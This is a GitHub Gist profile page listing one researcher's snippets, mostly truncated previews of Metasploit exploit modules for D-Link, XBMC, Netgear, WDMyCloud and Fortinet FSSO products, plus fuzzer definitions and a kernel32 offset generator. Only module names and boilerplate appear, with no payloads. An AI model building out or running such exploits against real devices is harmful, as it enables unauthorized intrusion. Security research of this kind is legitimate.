Skip to content

Instantly share code, notes, and snippets.

View phikshun's full-sized avatar

phikshun phikshun

85 followers · 0 following
View GitHub Profile
@phikshun
phikshun / dlink_dcp_command_exec.rb
Last active August 29, 2015 13:56
@phikshun
phikshun / xbmc_remote_exec.rb
Created February 20, 2014 23:31
XBMC EventServer API Metasploit Module
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'XBMC Remote UDP Code Exec',
@phikshun
phikshun / netgear_telnet_enabler.rb
Created March 18, 2014 23:49
Netgear Telnet Enabler
require 'msf/core'
require 'crypt/blowfish' # sorry, openssl is limited to 16-byte key size :(
# add gem 'crypt', '1.1.4' to Gemfile
module ::Crypt
class Blowfish
def setup_blowfish()
@sBoxes = Array.new(4) { |i| INITIALSBOXES[i].clone }
@pArray = INITIALPARRAY.clone
keypos = 0
@phikshun
phikshun / wdmycloud_cmd_injection_csrf.rb
Created March 20, 2014 00:51
WDMyCloud Command Injection CSRF
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'WDMyCloud NAS Command Injection CSRF',
@phikshun
phikshun / fsso.xml
Created March 22, 2015 20:27
Fortinet FSSO Peach Pit
<?xml version="1.0" encoding="utf-8"?>
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">
<DataModel name="FSSO">
<Number name="PktLen" size="32" endian="big">
<Relation type="size" of="Main" expressionSet="size+4" />
</Number>
<Block name="Main">
<Number name="PktTag" valueType="hex" value="80" size="8" endian="big" />
@phikshun
phikshun / dcagent.xml
Created March 29, 2015 19:44
Fortinet FSSO DCAgent Protocol Peach Pit
<?xml version="1.0" encoding="utf-8"?>
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">
<DataModel name="DataTSAgent">
<Number name="Length" size="16" endian="big">
<Relation type="size" of="Main" expressionSet="size+2" />
</Number>
<Block name="Main">
<Number name="Timestamp" size="32" valueType="string" value="1420054000" signed="false" endian="big">
@phikshun
phikshun / calc_magic.rb
Created March 29, 2015 20:19
DCAgent Exploit Kernel32.dll Offset Generator
#!/usr/bin/env ruby
require 'pedump'
require 'colorize'
@lang = {
0x0401 => 'ar',
0x0415 => 'pl',
0x0402 => 'bg',
0x0416 => 'pt-br',
@phikshun
phikshun / fsso_buffer_overflow.rb
Created March 29, 2015 20:39
Fortinet FSSO Stack Buffer Overflow Exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@phikshun
phikshun / fsso_dcagent_overflow.rb
Created March 29, 2015 20:23
Fortinet FSSO DCAgent Exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@phikshun
phikshun / gist:1554071
Created January 3, 2012 08:26
Patched jquery.pjax.js for rails/pjax pjax_redirect_to support.
// jquery.pjax.js
// copyright chris wanstrath
// https://github.com/defunkt/jquery-pjax
(function($){
// When called on a link, fetches the href with ajax into the
// container specified as the first parameter or with the data-pjax
// attribute on the link itself.
//